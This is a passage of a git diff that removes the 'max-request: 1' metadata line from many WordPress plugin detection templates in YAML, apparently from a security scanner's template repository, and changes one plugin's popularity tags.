a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..58d5c881d0 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,10 +7,9 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ 